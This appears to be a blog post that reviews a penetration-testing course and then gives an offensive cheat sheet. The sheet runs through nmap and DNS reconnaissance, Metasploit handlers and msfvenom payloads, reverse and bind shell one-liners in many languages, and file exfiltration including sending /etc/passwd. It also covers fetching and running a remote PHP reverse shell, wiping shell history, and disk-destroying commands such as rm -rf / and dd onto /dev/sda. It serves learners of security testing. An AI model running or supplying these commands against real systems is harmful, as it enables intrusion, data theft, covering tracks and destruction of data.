Recently I tried and passed (Certificate ID: 1837845437) the course Penetration Testing Course by Virtual Hacking Labs in which you need to complete at least 20 lab machines successfully in their virtual environment. Reviews.
The environment is very easy to use, using a VM with parrot or kali to complete/exploit as much servers as possible, nice and good documentation and guides. Totally recommended, if you want to learn doing something more than read.
Information Gathering
DNS
nslookup -type=any <DOMAIN>
host -t axfr -l <DOMAIN> <DNSSERVER>
dig -t mx <DOMAIN>
dig -t any <DOMAIN>
Nmap
# Service discovery
nmap -sV <IP>
nmap -sV -O <IP>
nmap -p 1-65535 -T4 -A -v -Pn <IP>
# Host discovery
nmap -sn <NETWORK>
# TCP connect scan
nmap -sT <IP>
# TCP SYN scan
nmap -sS <IP>
# TCP ACK scan
nmap -sA <IP>
# TCP Window scan
nmap -sW <IP>
# TCP Maimon scan
nmap -sM <IP>
## TCP Null Scan to fool a firewall to generate a response
## Does not set any bits (TCP flag header is 0)
nmap -sN <IP>
## TCP Fin scan to check firewall
## Sets just the TCP FIN bit
nmap -sF <IP>
## TCP Xmas scan to check firewall
## Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree
nmap -sX <IP>
# UDP port scanning
nmap -sU <IP>
nmap -sU -sS -p U:137-139,T:137-139,445 <IP>
# Aggressive scan
nmap -A <IP>
# Read the list of targets using a text file
nmap -iL IPs.txt
# Excluding hosts/networks
nmap <NETWORK> --exclude <IP> <IP>
# Scripting
nmap -p 139,445 --script=smb-vuln* <IP>
nmap -sV --script http-wordpress-enum --script-args limit=25 <IP>
nmap --script ftp-vsftpd-backdoor –p 21 <IP>
nmap -sV -script irc-unrealircd-backdoor -p 6667 <IP>
# Show all packets sent and received
nmap --packet-trace -p 22 <IP>
# Show host interfaces and routes
nmap --iflist
# Scan IPv6
nmap -6 <IPv6>
nmap -v A -6 <IPv6>
# Save output
nmap -oN <FILE> <IP>
MyIP
wget -qO- http://ipecho.net/plain; echo
SMB
smbclient -L <IP>
rpcclient -U "" <IP>
smbclient -U <HOST> -L <IP>
/usr/bin/smbclient \\\\<IP>\\share <HOST>
Exploitation
Search Exploits
nikto -h <http://IP>
searchsploit
sudo wpscan --url <IP>
Metasploit
Listener
- Windows
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <IP>
lhost => <IP>
msf exploit(handler) > set LPORT 4444
lport => 4444
msf exploit(handler) > run
- Linux
msf payload(linux/x86/meterpreter/reverse_tcp) > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST <IP>
LHOST => <IP>
msf exploit(multi/handler) > run
msfvenom
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war > shell.war
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f elf > shell.elf
Privilege escalation
Linux privilege escalation notes
Windows privilege escalation notes Common Windows Privilege Escalation Vectors
Check port
lsof +c 0 -i:40001 -n
Reverse Shells
Upgrade shell
python -c 'import pty; pty.spawn("/bin/bash");'
Listener
nc -lvp 4444
Target
# Bash
bash -i >& /dev/tcp/<IP>/4444 0>&1
# Perl
perl -e 'use Socket;$i="<IP>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# PHP
php -r '$sock=fsockopen("<IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Ruby
ruby -rsocket -e'f=TCPSocket.open("<IP>",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# Netcat
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc <IP> 4444 >/tmp/f
nc -e /bin/sh <IP> 444
# sh
0<&196; exec 196<>/dev/tcp/<IP>/4444; sh <&196 >&196 2>&196
# Socat
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444
Bind Shell
Target
# Windows
nc -lvp 4444 -e cmd.exe
# Linux
nc -lvp 4444 -e /bin/sh
Attacker
nc <IP> 4444
Sending files
exec 3<>/dev/tcp/<IP>/4444 && cat /etc/passwd>&3
With Netcat
Listener:
netcat -l 4444 > received_file
Target:
netcat <IP> 4444 < original_file
Listener:
netcat -l 4444 | tar xzvf -
Target:
tar -czf - * | netcat <IP> 4444
File upload in Windows with PowerShell
[Windows / DOS / PowerShell] File upload in command line
PHP web and reverse shells
wget -O /tmp/php_shell.php https://raw.githubusercontent.com/JohnTroony/php-webshells/master/php-reverse-shell.php && php -f /tmp/php_shell.php
Covering the tracks
Avoiding history
export HISTFILE=
unset HISTFILE
Clear history
rm -rf .bash_history
touch .bash_history (invasive)
history -c
set +o history
Destroy
rm -rf /
find / -type f -exec {}
mkfs.ext3 /dev/sda
dd if=/dev/zero of=/dev/sda bs=1M
Resources
escaping-restricted-linux-shells